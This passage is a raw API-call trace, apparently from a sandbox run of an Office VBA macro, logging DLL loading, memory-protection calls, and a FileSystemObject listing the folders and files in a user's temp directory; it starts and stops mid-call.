SysStringByteLen (bstr="") returned 0x0 [0132.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x1a7380, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x9b¤EfP÷Ë\x06\x08\x95Ð\x06", lpUsedDefaultChar=0x0) returned 0 [0132.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d0ca14, cbMultiByte=0, lpWideCharStr=0x37501aa, cchWideChar=2 | out: lpWideCharStr="") returned 0 [0132.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x36f2866, cbMultiByte=15, lpWideCharStr=0x1a7464, cchWideChar=16 | out: lpWideCharStr="wdTempFilePath") returned 15 [0132.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x336289a, cbMultiByte=15, lpWideCharStr=0x1a74c4, cchWideChar=16 | out: lpWideCharStr="wdTempFilePath") returned 15 [0132.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x336289a, cbMultiByte=15, lpWideCharStr=0x1a74c4, cchWideChar=16 | out: lpWideCharStr="wdTempFilePath") returned 15 [0132.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3362872, cbMultiByte=11, lpWideCharStr=0x1a7278, cchWideChar=10 | out: lpWideCharStr="GetFolder") returned 0 [0132.679] CRetailMalloc_Realloc () returned 0x6ceecc0 [0132.679] wcscpy_s (in: _Destination=0x6cee130, _SizeInWords=0xa, _Source="GetFolder" | out: _Destination="GetFolder") returned 0x0 [0132.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6663ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0132.680] CRetailMalloc_Realloc () returned 0x6e87f10 [0132.680] CRetailMalloc_Free () returned 0x1 [0132.680] GetCurrentProcess () returned 0xffffffff [0132.680] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6bb4d94, dwSize=0x14) returned 1 [0132.680] VirtualProtect (in: lpAddress=0x6bb4d94, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1a738c | out: lpflOldProtect=0x1a738c*=0x40) returned 1 [0132.681] GetCurrentProcess () returned 0xffffffff [0132.682] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6bb4d95, dwSize=0x2) returned 1 [0132.682] GetCurrentProcess () returned 0xffffffff [0132.682] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6bb4db4, dwSize=0x14) returned 1 [0132.682] VirtualProtect (in: lpAddress=0x6bb4db4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1a738c | out: lpflOldProtect=0x1a738c*=0x40) returned 1 [0132.682] GetCurrentProcess () returned 0xffffffff [0132.682] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6bb4db5, dwSize=0x2) returned 1 [0132.682] GetCurrentProcess () returned 0xffffffff [0132.682] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6bb4dd4, dwSize=0x14) returned 1 [0132.682] VirtualProtect (in: lpAddress=0x6bb4dd4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1a738c | out: lpflOldProtect=0x1a738c*=0x40) returned 1 [0132.683] GetCurrentProcess () returned 0xffffffff [0132.683] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6bb4dd5, dwSize=0x2) returned 1 [0132.683] GetCurrentProcess () returned 0xffffffff [0132.683] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6bb4df4, dwSize=0x14) returned 1 [0132.683] VirtualProtect (in: lpAddress=0x6bb4df4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1a738c | out: lpflOldProtect=0x1a738c*=0x40) returned 1 [0132.683] GetCurrentProcess () returned 0xffffffff [0132.683] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6bb4df5, dwSize=0x2) returned 1 [0132.683] SetErrorMode (uMode=0x8001) returned 0x8001 [0132.683] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0132.683] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x66400000 [0132.684] SetErrorMode (uMode=0x8001) returned 0x8001 [0132.684] GetProcAddress (hModule=0x66400000, lpProcName=0x2cc) returned 0x665f4f87 [0132.685] GetAsyncKeyState (vKey=3) returned 0 [0132.685] GetAsyncKeyState (vKey=3) returned 0 [0132.686] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x1a7c30 | out: lpclsid=0x1a7c30*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0 [0132.693] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0132.693] CoCreateInstance (in: rclsid=0x1a7c30*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), pUnkOuter=0x0, dwClsContext=0x15, riid=0x66618088*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1a7c00 | out: ppv=0x1a7c00*=0x84a1f08) returned 0x0 [0133.230] FileSystemObject:IUnknown:QueryInterface (in: This=0x84a1f08, riid=0x66626898*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x1a7c04 | out: ppvObject=0x1a7c04*=0x0) returned 0x80004002 [0133.230] FileSystemObject:IUnknown:QueryInterface (in: This=0x84a1f08, riid=0x666268a8*(Data1=0x37d84f60, Data2=0x42cb, Data3=0x11ce, Data4=([0]=0x81, [1]=0x35, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xb8, [7]=0x51)), ppvObject=0x1a7c08 | out: ppvObject=0x1a7c08*=0x0) returned 0x80004002 [0133.230] FileSystemObject:IUnknown:QueryInterface (in: This=0x84a1f08, riid=0x666180a8*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1a7c0c | out: ppvObject=0x1a7c0c*=0x84a1f08) returned 0x0 [0133.230] FileSystemObject:IUnknown:Release (This=0x84a1f08) returned 0x1 [0133.248] FileSystemObject:IUnknown:AddRef (This=0x84a1f08) returned 0x2 [0133.248] FileSystemObject:IUnknown:Release (This=0x84a1f08) returned 0x1 [0133.248] GetAsyncKeyState (vKey=3) returned 0 [0133.338] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x84a1f08, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7c78*="GetFolder", cNames=0x1, lcid=0x409, rgDispId=0x1a7c7c | out: rgDispId=0x1a7c7c*=10013) returned 0x0 [0133.339] FileSystemObject:IDispatch:Invoke (in: This=0x84a1f08, dispIdMember=10013, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7c50*(rgvarg=([0]=0x1a7c84*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="c:\\users\\keecfm~1\\appdata\\local\\temp", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x1a7c98, pExcepInfo=0x1a7c30, puArgErr=0x1a7c60 | out: pDispParams=0x1a7c50*(rgvarg=([0]=0x1a7c84*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="c:\\users\\keecfm~1\\appdata\\local\\temp", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x1a7c98*(varType=0x9, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3243974, varVal2=0x0), pExcepInfo=0x1a7c30*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7c60*=0x0) returned 0x0 [0133.339] FileSystemObject:IUnknown:AddRef (This=0x3243974) returned 0x2 [0133.339] CRetailMalloc_Alloc () returned 0x6e8ac60 [0133.340] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3362a86, cbMultiByte=12, lpWideCharStr=0x1a71b8, cchWideChar=11 | out: lpWideCharStr="SubFolders") returned 0 [0133.341] wcscpy_s (in: _Destination=0x6cee180, _SizeInWords=0xb, _Source="SubFolders" | out: _Destination="SubFolders") returned 0x0 [0133.341] CRetailMalloc_Realloc () returned 0x6d82538 [0133.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3362aae, cbMultiByte=7, lpWideCharStr=0x1a71b8, cchWideChar=6 | out: lpWideCharStr="Files") returned 0 [0133.341] wcscpy_s (in: _Destination=0x6cee19c, _SizeInWords=0x6, _Source="Files" | out: _Destination="Files") returned 0x0 [0133.341] CRetailMalloc_Realloc () returned 0x6e8b470 [0133.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3361216, cbMultiByte=6, lpWideCharStr=0x1a71b8, cchWideChar=5 | out: lpWideCharStr="Name") returned 0 [0133.342] wcscpy_s (in: _Destination=0x6cee1ac, _SizeInWords=0x5, _Source="Name" | out: _Destination="Name") returned 0x0 [0133.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20f6c, cbMultiByte=5, lpWideCharStr=0x3750bb0, cchWideChar=12 | out: lpWideCharStr="jax.k") returned 5 [0133.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x36f2892, cbMultiByte=4, lpWideCharStr=0x1a73a4, cchWideChar=5 | out: lpWideCharStr="Err") returned 4 [0133.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3362afa, cbMultiByte=4, lpWideCharStr=0x1a7404, cchWideChar=5 | out: lpWideCharStr="Err") returned 4 [0133.344] CRetailMalloc_Alloc () returned 0x6d46b70 [0133.344] CRetailMalloc_Realloc () returned 0x6e80ef0 [0133.345] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3362b1a, cbMultiByte=6, lpWideCharStr=0x1a73dc, cchWideChar=7 | out: lpWideCharStr="Clear") returned 6 [0133.345] CRetailMalloc_Realloc () returned 0x6d0b3b8 [0133.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6663ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0133.346] CRetailMalloc_Alloc () returned 0x6bb2858 [0133.346] CRetailMalloc_Realloc () returned 0x6e8ac60 [0133.346] CRetailMalloc_Free () returned 0xf20001 [0133.346] GetCurrentProcess () returned 0xffffffff [0133.346] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6bb4d94, dwSize=0x14) returned 1 [0133.346] VirtualProtect (in: lpAddress=0x6bb4d94, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1a72cc | out: lpflOldProtect=0x1a72cc*=0x40) returned 1 [0133.347] GetCurrentProcess () returned 0xffffffff [0133.347] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6bb4d95, dwSize=0x2) returned 1 [0133.347] GetCurrentProcess () returned 0xffffffff [0133.347] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6bb4db4, dwSize=0x14) returned 1 [0133.347] VirtualProtect (in: lpAddress=0x6bb4db4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1a72cc | out: lpflOldProtect=0x1a72cc*=0x40) returned 1 [0133.348] GetCurrentProcess () returned 0xffffffff [0133.348] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6bb4db5, dwSize=0x2) returned 1 [0133.348] GetCurrentProcess () returned 0xffffffff [0133.348] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6bb4dd4, dwSize=0x14) returned 1 [0133.348] VirtualProtect (in: lpAddress=0x6bb4dd4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1a72cc | out: lpflOldProtect=0x1a72cc*=0x40) returned 1 [0133.348] GetCurrentProcess () returned 0xffffffff [0133.348] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6bb4dd5, dwSize=0x2) returned 1 [0133.348] GetCurrentProcess () returned 0xffffffff [0133.348] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6bb4df4, dwSize=0x14) returned 1 [0133.349] VirtualProtect (in: lpAddress=0x6bb4df4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1a72cc | out: lpflOldProtect=0x1a72cc*=0x40) returned 1 [0133.349] GetCurrentProcess () returned 0xffffffff [0133.349] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6bb4df5, dwSize=0x2) returned 1 [0133.349] SetErrorMode (uMode=0x8001) returned 0x8001 [0133.349] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0133.349] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x66400000 [0133.350] SetErrorMode (uMode=0x8001) returned 0x8001 [0133.350] GetProcAddress (hModule=0x66400000, lpProcName=0x2ad) returned 0x664ac02a [0133.351] GetAsyncKeyState (vKey=3) returned 0 [0133.351] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3243974, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="SubFolders", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=10001) returned 0x0 [0133.351] FileSystemObject:IDispatch:Invoke (in: This=0x3243974, dispIdMember=10001, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7bd8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7bd8*(varType=0x9, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x84a1f78, varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.397] FileSystemObject:IUnknown:AddRef (This=0x84a1f78) returned 0x2 [0133.397] FileSystemObject:IUnknown:Release (This=0x84a1f78) returned 0x1 [0133.397] FileSystemObject:IDispatch:Invoke (in: This=0x84a1f78, dispIdMember=-4, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b34*(rgvarg=0x0, rgdispidNamedArgs=0x6e8ac74, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7b44, pExcepInfo=0x1a7b14, puArgErr=0x1a7b54 | out: pDispParams=0x1a7b34*(rgvarg=0x0, rgdispidNamedArgs=0x6e8ac74, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7b44*(varType=0xd, wReserved1=0x6534, wReserved2=0x20b2, wReserved3=0x6534, varVal1=0x84a1fa8, varVal2=0x0), pExcepInfo=0x1a7b14*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b54*=0x84a1f68) returned 0x0 [0133.397] FileSystemObject:IUnknown:QueryInterface (in: This=0x84a1fa8, riid=0x6662da88*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1a7bd0 | out: ppvObject=0x1a7bd0*=0x84a1fa8) returned 0x0 [0133.398] FileSystemObject:IUnknown:Release (This=0x84a1fa8) returned 0x1 [0133.398] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fa8, celt=0x1, rgvar=0x1a7b8c*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x664b3e08, varVal2=0x84a1f78), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.399] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x84faaec, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ac0*="SubFolders", cNames=0x1, lcid=0x409, rgDispId=0x1a7ac4 | out: rgDispId=0x1a7ac4*=10001) returned 0x0 [0133.399] FileSystemObject:IDispatch:Invoke (in: This=0x84faaec, dispIdMember=10001, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7a98*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7af4, pExcepInfo=0x1a7a78, puArgErr=0x1a7aa8 | out: pDispParams=0x1a7a98*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7af4*(varType=0x9, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x84a1fd8, varVal2=0x0), pExcepInfo=0x1a7a78*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7aa8*=0x0) returned 0x0 [0133.399] FileSystemObject:IUnknown:AddRef (This=0x84a1fd8) returned 0x2 [0133.399] FileSystemObject:IUnknown:Release (This=0x84a1fd8) returned 0x1 [0133.399] FileSystemObject:IDispatch:Invoke (in: This=0x84a1fd8, dispIdMember=-4, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7a50*(rgvarg=0x0, rgdispidNamedArgs=0x6e8ac74, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7a60, pExcepInfo=0x1a7a30, puArgErr=0x1a7a70 | out: pDispParams=0x1a7a50*(rgvarg=0x0, rgdispidNamedArgs=0x6e8ac74, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7a60*(varType=0xd, wReserved1=0x6534, wReserved2=0x20b2, wReserved3=0x6534, varVal1=0x84a1fe8, varVal2=0x0), pExcepInfo=0x1a7a30*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7a70*=0x84a1fc8) returned 0x0 [0133.399] FileSystemObject:IUnknown:QueryInterface (in: This=0x84a1fe8, riid=0x6662da88*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1a7aec | out: ppvObject=0x1a7aec*=0x84a1fe8) returned 0x0 [0133.399] FileSystemObject:IUnknown:Release (This=0x84a1fe8) returned 0x1 [0133.399] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7aa8*(varType=0x0, wReserved1=0x0, wReserved2=0x7ba0, wReserved3=0x1a, varVal1=0x664b3e08, varVal2=0x84a1fd8), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1 [0133.400] FileSystemObject:IUnknown:Release (This=0x84a1fe8) returned 0x0 [0133.400] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x84faaec, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ac0*="Files", cNames=0x1, lcid=0x409, rgDispId=0x1a7ac4 | out: rgDispId=0x1a7ac4*=10002) returned 0x0 [0133.400] FileSystemObject:IDispatch:Invoke (in: This=0x84faaec, dispIdMember=10002, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7a98*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7af4, pExcepInfo=0x1a7a78, puArgErr=0x1a7aa8 | out: pDispParams=0x1a7a98*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7af4*(varType=0x9, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x84a1ff8, varVal2=0x0), pExcepInfo=0x1a7a78*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7aa8*=0x0) returned 0x0 [0133.400] FileSystemObject:IUnknown:AddRef (This=0x84a1ff8) returned 0x2 [0133.400] FileSystemObject:IUnknown:Release (This=0x84a1ff8) returned 0x1 [0133.400] FileSystemObject:IDispatch:Invoke (in: This=0x84a1ff8, dispIdMember=-4, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7a50*(rgvarg=0x0, rgdispidNamedArgs=0x6e8aca5, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7a60, pExcepInfo=0x1a7a30, puArgErr=0x1a7a70 | out: pDispParams=0x1a7a50*(rgvarg=0x0, rgdispidNamedArgs=0x6e8aca5, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7a60*(varType=0xd, wReserved1=0x6534, wReserved2=0x20b2, wReserved3=0x6534, varVal1=0x84a2008, varVal2=0x0), pExcepInfo=0x1a7a30*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7a70*=0x84a1fe8) returned 0x0 [0133.400] FileSystemObject:IUnknown:QueryInterface (in: This=0x84a2008, riid=0x6662da88*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1a7ae4 | out: ppvObject=0x1a7ae4*=0x84a2008) returned 0x0 [0133.400] FileSystemObject:IUnknown:Release (This=0x84a2008) returned 0x1 [0133.400] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a2008, celt=0x1, rgvar=0x1a7aa8*(varType=0x0, wReserved1=0x0, wReserved2=0x7ba0, wReserved3=0x1a, varVal1=0x664b3e08, varVal2=0x84a1ff8), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1 [0133.400] FileSystemObject:IUnknown:Release (This=0x84a2008) returned 0x0 [0133.400] FileSystemObject:IUnknown:Release (This=0x84a1fd8) returned 0x0 [0133.401] FileSystemObject:IUnknown:Release (This=0x84a1ff8) returned 0x0 [0133.401] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fa8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0xad14, wReserved3=0x6e8, varVal1=0x1a7c5c, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.401] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x84a35f4, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ac0*="SubFolders", cNames=0x1, lcid=0x409, rgDispId=0x1a7ac4 | out: rgDispId=0x1a7ac4*=10001) returned 0x0 [0133.401] FileSystemObject:IDispatch:Invoke (in: This=0x84a35f4, dispIdMember=10001, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7a98*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7af4, pExcepInfo=0x1a7a78, puArgErr=0x1a7aa8 | out: pDispParams=0x1a7a98*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7af4*(varType=0x9, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x84a1ff8, varVal2=0x0), pExcepInfo=0x1a7a78*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7aa8*=0x0) returned 0x0 [0133.401] FileSystemObject:IUnknown:AddRef (This=0x84a1ff8) returned 0x2 [0133.401] FileSystemObject:IUnknown:Release (This=0x84a1ff8) returned 0x1 [0133.401] FileSystemObject:IDispatch:Invoke (in: This=0x84a1ff8, dispIdMember=-4, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7a50*(rgvarg=0x0, rgdispidNamedArgs=0x6e8ac74, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7a60, pExcepInfo=0x1a7a30, puArgErr=0x1a7a70 | out: pDispParams=0x1a7a50*(rgvarg=0x0, rgdispidNamedArgs=0x6e8ac74, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7a60*(varType=0xd, wReserved1=0x6534, wReserved2=0x20b2, wReserved3=0x6534, varVal1=0x84a1fc8, varVal2=0x0), pExcepInfo=0x1a7a30*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7a70*=0x84a1fe8) returned 0x0 [0133.401] FileSystemObject:IUnknown:QueryInterface (in: This=0x84a1fc8, riid=0x6662da88*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1a7aec | out: ppvObject=0x1a7aec*=0x84a1fc8) returned 0x0 [0133.402] FileSystemObject:IUnknown:Release (This=0x84a1fc8) returned 0x1 [0133.402] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fc8, celt=0x1, rgvar=0x1a7aa8*(varType=0x0, wReserved1=0x0, wReserved2=0x7ba0, wReserved3=0x1a, varVal1=0x664b3e08, varVal2=0x84a1ff8), 